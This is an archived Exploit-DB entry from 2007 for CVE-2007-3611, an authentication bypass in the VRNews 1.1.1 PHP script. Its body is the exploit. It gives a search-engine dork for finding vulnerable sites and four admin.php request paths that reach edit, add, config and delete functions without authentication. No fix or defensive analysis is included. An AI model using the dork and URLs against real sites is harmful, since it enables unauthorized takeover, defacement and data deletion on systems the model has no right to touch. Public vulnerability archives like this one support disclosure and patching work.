VRNews 1.1.1 admin.php Remote Permission Bypass Vulnerability

2007-07-05T00:00:00
ID EDB-ID:4150
Type exploitdb
Reporter R4M!
Modified 2007-07-05T00:00:00

Description

VRNews 1.1.1 (admin.php) Remote Permission Bypass Vulnerability. CVE-2007-3611. Webapps exploit for php platform

                                        
                                            VRNews v1.x <= /VRNews/admin.php Permission
 
Found by: R4M! - Rami@live.de
 
Dork: intitle:"vrnews v1"
 
Script: http://www.toocharger.com/fiches/scripts/vrnews/3632.htm
 
Example:
1. /VRNews/admin.php?act=edit
2. /VRNews/admin.php?act=add
3. /VRNews/admin.php?act=config
4. /VRNews/admin.php?act=del

# milw0rm.com [2007-07-05]